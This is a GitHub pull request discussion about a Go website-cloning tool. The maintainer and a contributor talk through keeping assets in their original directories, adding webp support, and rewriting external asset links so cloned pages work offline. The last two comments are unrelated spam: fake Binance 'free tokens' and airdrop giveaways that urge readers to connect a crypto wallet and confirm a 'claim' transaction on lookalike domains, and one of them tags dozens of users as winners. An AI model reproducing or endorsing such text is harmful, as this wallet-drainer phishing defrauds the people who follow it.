### PR TITLE
Keep assets (js, css, img) original directory

### PR DESCRIPTION
**Pull request by yang-wei**
Hey, awesome project.

Before this changes, every JavaScript goes to /js, every image goes to /img.
Not only does this change the original directory (unexpected behaviour?), it makes the code complicated (We need to replace the link).

This commit keeps the structure, what do you think

Also added webp support.

Let me know if you are not interested in this at all.

### CODE REVIEW

File: pkg/crawler/extractor.go [hunk 1]
```diff
@@ -4,22 +4,23 @@ import (
...
+	supportedExtension = map[string]struct{}{
+		".css": {},
+		".js":   {},
+		".jpg":  {},
+		".jpeg": {},
+		".gif":  {},
+		".png":  {},
+		".svg":  {},
+		".webp":  {},
 	}
```
Comment (imthaghost) [inline pkg/crawler/extractor.go:24]: great variable name and nice support for webp!

**Comment by imthaghost** [comment]
Hey @yang-wei,

Thanks for the submission! This was one of my first Golang projects so things are probably overly complicated where they do not need to be. 

Few questions for clarification. What do you mean by "keeps the structure"? In this PR it appears you are grabbing all of the web assets and dumping them into the root directory. I think the initial reasoning I had behind creating a directory for each web asset ( /js /imgs ect) is the fact web pages aren't flat and are tree-like(similar to your computer file structure). Say if we need to clone multiple pages within a single URL having the structure of the site flat-like (dumping all the files in the root directory) that can eventually get really messy and hard to navigate. Are there any other benefits besides having potential unexpected behavior for making the structure like so?

**Comment by yang-wei** [comment]
@imthaghost good work on your first Go project though. Indeed they were simpler and very easy to understand. That said if you don't like this PR please feel free to close it (=.  I forked your project by myself

yeah my intention was to clone the website as how it was uploaded. This has a few benefit

- no additional asset folder needed to be add if there is a new one (for eg: fonts)
- no rewrite (html.LinkRestructure) needed to be done (=

**Comment by imthaghost** [comment]
@yang-wei Makes sense! I will fork your repo and test out your work as well to see what you are trying to accomplish because I'm still having a little bit of trouble understanding what you mean by "clone the website as to how it was uploaded." Most sites are going to store all of their assets in their respective directories. Ideally, it would be easier to just look at the web asset's source string and make a decision to either make a directory or add the file to the existing directory if it isn't already there. 

For example: 
```HTML
<link  media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark_dimmed-932bbbdd85ad53c16ed9eee9f87bf4f7.css" />
```
We can either create the directory `/assets` then we just add the file to its respective directory.

**Comment by imthaghost** [comment]
@yang-wei After cloning your fork I totally see what you are trying to accomplish. Thanks for the submission!

 This makes the project much cleaner since there is no need for putting files in new directories and doing rearrangement (which tries to preserve the original file structure) from the target site. However, I did encounter a couple of issues. The changes don't handle the case when the asset does not have a local path on the target site. 
For example:
```HTML
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
```
There is not a relative path in this asset string so no directory gets created for this asset and the file gets stored into the root directory of the project. And the link inside of the HTML would remain as `https://code.jquery.com/jquery-3.4.1.min.js`.
```bash
├── css
├── images
├── index.html
├── jquery-3.4.1.min.js
├── js
```
But keeping a link as such would require us to request the resource from the internet. We want to be able to browse our site locally even if we don't have an internet connection, so we would still have to rearrange the relative links inside the HTML. 

Do you have suggestions on how you would solve that particular case?

Also, I love the PR no need to close it. Def want to work on solving this special case and potentially merging your submission in!

**Comment by yang-wei** [comment]
Thank you!

Good one. This is what I didn't intend to do but rewriting will be the only way as far as I could think of (=

**Comment by imthaghost** [comment]
> Thank you!
> 
> Good one. This is what I didn't intend to do but rewriting will be the only way as far as I could think of (=

Agreed. I was thinking about doing a pretty big refactor of the project since there isn't even the simplest of error handling..
I think I could continue the work off of this branch since I like the structure you proposed. :)

**Comment by p4u1d34n** [comment]
[Binance Free Tokens](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by marianrolon** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @mosiman, @voxelhog, @khannz, @iPitaya, @soumyadebna, @SomniSom, @hemon, @femtotrader, @linjianfeng3581, @conbanwa, @aeleftheriadis, @bvp, @piersy, @sfter, @datochan, @dc365, @rezahdi, @sangbin-kim, @nmajorov, @yaoligang, @xiangliangX, @aretcamgoz, @ianldgs, @ming871, @AleDema, @GuihaiHU, @corintio, @ivzb, @jlaw, @horgh, @johndunne, @firstrow, @alisiddiqi01, @flemeur, @no7dw, @abba, @wuyongyi, @bygui86, @day0market, @svkior, @scottzeng1999, @lzmhhh123, @leifcr, @NineDfish, @wudi, @sstall, @hectopod, @jianyuan, @morebuff, @ncode

**Pull request closed without merging**